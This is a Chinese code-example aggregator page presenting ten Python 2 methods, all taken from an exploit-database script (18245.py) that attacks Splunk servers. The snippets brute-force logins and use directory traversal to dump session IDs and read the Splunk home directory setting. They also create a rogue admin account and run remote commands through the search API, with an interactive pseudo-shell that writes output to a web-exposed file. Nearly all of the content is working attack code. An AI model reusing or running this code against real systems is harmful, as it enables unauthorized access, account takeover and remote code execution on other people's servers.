• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

Python requestbuilder.Requestobj类代码示例

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

本文整理汇总了Python中sec1httplib.requestbuilder.Requestobj的典型用法代码示例。如果您正苦于以下问题:Python Requestobj类的具体用法?Python Requestobj怎么用?Python Requestobj使用的例子?那么恭喜您, 这里精选的类代码示例或许可以为您提供帮助。



在下文中一共展示了Requestobj类的10个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。

示例1: attempt_login

    def attempt_login():
        # Dont continue if we already have admin
        if splunk_object.got_admin == 1:
            return False

        login_url = "{0}/services/auth/login".format(targeturl.rstrip())
        r = Requestobj(login_url)
        poststr = "username={0}&password={1}".format(username.rstrip(),password.rstrip())
        r.rawpostdata("POST", poststr)
        result = r.makerequest()
        counter.sub()
        counter.print_remaining()
 

        if result.find_data("Remote login disabled because you are using a free license"):
            print "[i] Free licence in use. No remote login required"
            print "[!] run the exploit again with the -f flag"
            sys.exit()
        
        if result.find_data("sessionKey"):
            print "[***] Cracked: %s:%s\n" % (username.rstrip(),password.rstrip())
            try:
                if splunk_object.user_is_admin(username.rstrip(),password.rstrip()):
                    splunk_object.username = username.rstrip()
                    splunk_object.password = password.rstrip()
                    splunk_object.got_admin =1
                    #print "ADMIN",splunk_object.got_admin
                    splunk_object.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0]
            except Exception as err:
                print "[i] Error getting auth details",err

            return (username,password)
        else:
            pass
开发者ID:0x24bin,项目名称:exploit-database,代码行数:34,代码来源:18245.py


示例2: dump_session_ids

    def dump_session_ids(self):
        "Exploits dir traversal issue to dump session ids"
        print "[i] Attemping to dump sessions"
        if self.splunkd == 1 and self.username and self.password:
            #url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url))
            url = Requestobj("{0}/servicesNS/-/system/properties/..%2f..%2f..%2fvar%2flog%2fsplunk%2fweb_service.log%00/default".format(self.splunkd_url))

            url.basic_auth(self.username,self.password)
            result = url.makerequest()
            sessions=[]
            if "session=" in result.body:
                print "[i] Session ID's extracted from web_service.log"
                sessions = re.findall("session=(.+?)[<\s]",result.body)
            for session in set(sessions):
                print "[SESSION]",session
            return set(sessions)
开发者ID:0x24bin,项目名称:exploit-database,代码行数:16,代码来源:18245.py


示例3: splunkd_auth

    def splunkd_auth(self):
        login_url = "{0}/services/auth/login".format(self.splunkd_url)
        r = Requestobj(login_url)
        poststr = "username={0}&password={1}".format(self.username.rstrip(),self.password.rstrip())
        r.rawpostdata("POST", poststr)
        result = r.makerequest()
        if result.find_data("Remote login disabled because you are using a free license"):
            print "[i] Free licence in use. No remote login required"
            print "[!] run the exploit again with the -f flag"
            sys.exit()

        if result.find_data("sessionKey"):
            self.session_key = re.findall("<sessionKey>(.+?)</sessionKey>",result.body)[0]
            return True
        else:
            return False
开发者ID:0x24bin,项目名称:exploit-database,代码行数:16,代码来源:18245.py


示例4: user_is_admin

    def user_is_admin(self,username,password):
        if self.splunkd == 1:
            # attempt to auth via splunkd to get a sessionkey
            self.username = username
            self.password = password
            self.splunkd_auth()
            url = Requestobj("{0}/services/authentication/httpauth-tokens".format(self.splunkd_url))
            url.basic_auth(username,password)

            context = url.makerequest()
            
            if '<title>httpauth-tokens' in context.body:
                self.got_admin =1
                return True
            else:
                return False
        elif self.splunkweb == 1:
            with misc_lock:
                self.username = username
                self.password = password
                if self.splunkweb_auth():
                    admin_only = Requestobj("{0}/en-US/manager/launcher/server/settings/settings?action=edit".format(self.splunkweb_url)).makerequest()
                    if admin_only.find_data("Port that Splunk Web uses"):
                        print "[i] User:{0} IS AN ADMIN.".format(username)
                        return True
                    else:
                        print "[i] User:{0} is not an admin".format(username)
                else:
                    pass
                
        else:
            print "Not Connected"
            return False
开发者ID:0x24bin,项目名称:exploit-database,代码行数:33,代码来源:18245.py


示例5: search_exploit_psudoshell

    def search_exploit_psudoshell(self):
        "Execute commands via search exploit. Payload implements a virtual shell"
        if not self.username or not self.password:
            print "[i] Valid username and password required"
            sys.exit()
        if not self.splunkweb == 1:
            print "[error] Managment Web Interface required for this payload"
            return ""
        
        if self.web_authed == 0:
            self.splunkweb_auth()

        base_dir = self.get_splunk_home()
        #if not base_dir:
        #    print "Failed to get splunk basedir"
        #    base_dir = "/opt/splunk"

        command=""
        while 1:
            print command.rstrip()
            command=raw_input("shell>")#
            if command.rstrip() == "exit": break

            if "windows" in self.os_name.lower():
                tmp = ">\"{0}\\share\splunk\search_mrsparkle\exposed\js\.tmp\"".format(base_dir)
                command = command + tmp #'"'+ tmp +'"'
            else:
                tmp = ">{0}/share/splunk/search_mrsparkle/exposed/js/.tmp".format(base_dir)
                command = command + tmp
            
            attack_body = self.search_payload_cmd(command)#

            attack_body = urllib.quote(urllib.unquote(attack_body))
            psudoshell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url))
            psudoshell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body))
            for c in psudoshell_req.get_cookiejar():
                if "session" in c.name:
                    psudoshell_req.add_header("X-Requested-With","XMLHttpRequest")
                    psudoshell_req.add_header("X-Splunk-Session",c.value)
            x = psudoshell_req.makerequest()
            import time
            time.sleep(3)
            print Requestobj("{0}/en-US/static/@105575/js/.tmp".format(self.splunkweb_url)).makerequest().body
开发者ID:0x24bin,项目名称:exploit-database,代码行数:43,代码来源:18245.py


示例6: add_admin

    def add_admin(self,username,password,sessionKey):
        # look for 201
        if self.splunkd == 1 and self.username and self.password:
            url = Requestobj("{0}/servicesNS/-/launcher/authentication/users".format(self.splunkd_url))
            url.basic_auth(self.username,self.password)
            url.rawpostdata("POST","roles=user&roles=admin&name={0}&defaultApp=search&password={1}&email=&createrole=0&realname=".format(username,password))
            url.add_header("authorization","Splunk {0}".format(sessionKey))
            result = url.makerequest()
            if str(result.code) == "201":
                return True
            else:
                return False

        else:
            print "[!] Not connected to splunkd. Check port and creds"
            return False
开发者ID:0x24bin,项目名称:exploit-database,代码行数:16,代码来源:18245.py


示例7: get_splunk_home

    def get_splunk_home(self):
        if not self.username or not self.password:
            print "[i] Valid username and password required"
            sys.exit()
        try:
            r = Requestobj("{0}/services/properties/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt%2fsplunk%2fetc%2fsplunk-launch/default/SPLUNK_HOME".format(self.splunkd_url))
            r.basic_auth(self.username,self.password)
            splunkdir =  r.makerequest()

            if "ERROR" not in splunkdir.body and "Remote login disabled" not in splunkdir.body and self.splunkd:
                self.splunk_home = splunkdir.body.strip()
            else:
                print "[***] Could not get home dir setting default.."
                if "windows" in self.os_name.lower():
                    self.splunk_home = "c:\\program files\\splunk"
                else:
                    self.splunk_home = "/opt/splunk"

                print "Setting Splunk home dir to:{0}".format(self.splunk_home)

            return self.splunk_home

        except Exception as err:
            print "[i] Error occured while attempting to read splunk home dir",err
开发者ID:0x24bin,项目名称:exploit-database,代码行数:24,代码来源:18245.py


示例8: splunkweb_auth

    def splunkweb_auth(self):

        if self.web_authed == 1:
            return True

        login_page = Requestobj("{0}/en-GB/account/login".format(self.splunkweb_url)).makerequest() # Get session cookie
        
        cval=""
        cval = login_page.extract_data_body('name="cval" value="(\d+?)"')
        if cval:
            cval = cval[0]
        r = Requestobj(login_page.url)
        poststr = "cval={0}&return_to=%2Fen-GB%2F&username={1}&password={2}".format(cval,self.username.rstrip(),self.password.rstrip())
        r.rawpostdata("POST", poststr)
        result = r.makerequest()
        
        if result.find_data("This resource can be found at"):
            return True
            self.web_authed = 1
        else:
            print "[i] Login Failed"
            exit()
开发者ID:0x24bin,项目名称:exploit-database,代码行数:22,代码来源:18245.py


示例9: search_exploit_cmd

    def search_exploit_cmd(self,command):
        "Execute commands via search exploit."

        if self.splunkweb == 1 and self.got_admin:
            if self.web_authed == 0:
                self.splunkweb_auth()
                
            print "[i] Executing Command:{0}".format(command)
            attack_body = self.search_payload_cmd(command)#
            attack_body = urllib.quote(urllib.unquote(attack_body))
            shell_req = Requestobj("{0}/en-GB/api/search/jobs".format(self.splunkweb_url))
            shell_req.rawpostdata("POST","search={0}&status_buckets=300&namespace=search&ui_dispatch_app=search&ui_dispatch_view=flashtimeline&auto_cancel=100&required_field_list=*&earliest_time=&latest_time=".format(attack_body))
            for c in shell_req.get_cookiejar():
                if "session" in c.name:
                    shell_req.add_header("X-Requested-With","XMLHttpRequest")
                    shell_req.add_header("X-Splunk-Session",c.value)
            x = shell_req.makerequest()

        elif self.splunkd == 1 and self.got_admin and self.session_key:

            print "[i] Executing Command:{0}".format(command)
            attack_body = self.search_payload_cmd(command)#
            attack_body = urllib.quote(urllib.unquote(attack_body))
            shell_req = Requestobj("{0}/servicesNS/admin/search/search/jobs".format(self.splunkd_url))
            shell_req.rawpostdata("POST","ui_dispatch_app=search&search={0}&required_field_list=%2A&ui_dispatch_view=flashtimeline&max_count=10000&time_format=%25s.%25Q&latest_time=&status_buckets=300&earliest_time=&auto_cancel=100".format(attack_body))
            shell_req.add_header("authorization","Splunk {0}".format(self.session_key))
            x = shell_req.makerequest()
        else:
            print "Session",self.session_key
            print "Admin",self.got_admin
            print "Splunkd",self.splunkd
            print "[i] Exploit failed. Not connected or access denied"
开发者ID:0x24bin,项目名称:exploit-database,代码行数:32,代码来源:18245.py


示例10: __init__

    def __init__(self,hostaddr,splunkd_port=8089,splunkweb_port=8000):
        
        self.splunkd_port = splunkd_port
        self.splunkweb_port = splunkweb_port
        self.max_threads = 20
        self.username=""
        self.password = ""
        self.session_key =""
        self.splunk_home = ""
        self.got_admin = 0
        self.web_authed = 0 # are we authed to the web interface
        self.freelic =0
        # Check splunkd server
        info = Requestobj("https://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest()
        if info.body:
            self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc)
        else:
            info = Requestobj("http://{0}:{1}/services/server/info/server-info".format(hostaddr,splunkd_port)).makerequest()
            self.splunkd_url = "{0}://{1}".format(urlparse.urlparse(info.url).scheme,urlparse.urlparse(info.url).netloc)

        if "server-info" in info.body:
 
            self.splunkd =1
            try:
                self.os_build = re.findall("os_build\">(.+?)<",info.body)[0]
                self.os_name = re.findall("os_name\">(.+?)<",info.body)[0]
                self.os_version = re.findall("os_version\">(.+?)<",info.body)[0]
                self.server_name = re.findall("serverName\">(.+?)<",info.body)[0]
                self.splunk_version = re.findall("\"version\">(.+?)<",info.body)[0]
                self.cpu_arch = re.findall("cpu_arch\">(.+?)<",info.body)[0]
                print "[i] Splunkd server found. Version:{0}".format(self.splunk_version)
                print "[i] OS:{0} {1} {2}".format(self.os_name,self.os_version,self.os_build)
            except Exception as err:
                print "Error getting splunk server info",err
        else:
            self.splunkd =0


        # Check splunk web
        splunkweb_info = Requestobj("http://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest()
        if splunkweb_info.body:
            self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc)
        else:
            splunkweb_info = Requestobj("https://{0}:{1}/en-GB/account/login".format(hostaddr,splunkweb_port)).makerequest()
            self.splunkweb_url = "{0}://{1}".format(urlparse.urlparse(splunkweb_info.url).scheme,urlparse.urlparse(splunkweb_info.url).netloc)


        if "Splunk" in splunkweb_info.body:
            print "[i] Splunk web interface discovered"
            self.splunkweb =1
            self.cval=""
            try:
                self.cval = splunkweb_info.extract_data_body('name="cval" value="(\d+?)"')[0]
                print "[i] CVAL:{0}".format(self.cval)
            except:
                print "[i] Error getting cval"
                self.splunkweb =0

        else:
            self.splunkweb =0

        if self.splunkweb ==1:
            try:
                url ="{0}/en-GB/manager/system/licensing".format(self.splunkweb_url)
                lic = Requestobj(url).makerequest()
                if "<h1>Free license group</h1>" in lic.body:
                    print "[i] Configured with free licence. No auth required"
                    #if not self.splunkd:
                    #    print "[i] Cannot connect to splunkd using free licence"
                    #    sys.exit()
                    self.got_admin=1
                    self.username="admin"
                    self.password="admin"
                    self.web_authed=1
                    self.splunkd=0
                    self.freelic=1
                    self.pop_shell()

            except Exception as err:
                print "error",err
                exit()
开发者ID:0x24bin,项目名称:exploit-database,代码行数:81,代码来源:18245.py



注:本文中的sec1httplib.requestbuilder.Requestobj类示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。


鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
Python secret.twitter_instance函数代码示例发布时间:2022-05-27
下一篇:
Python helpers.typecheck函数代码示例发布时间:2022-05-27
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap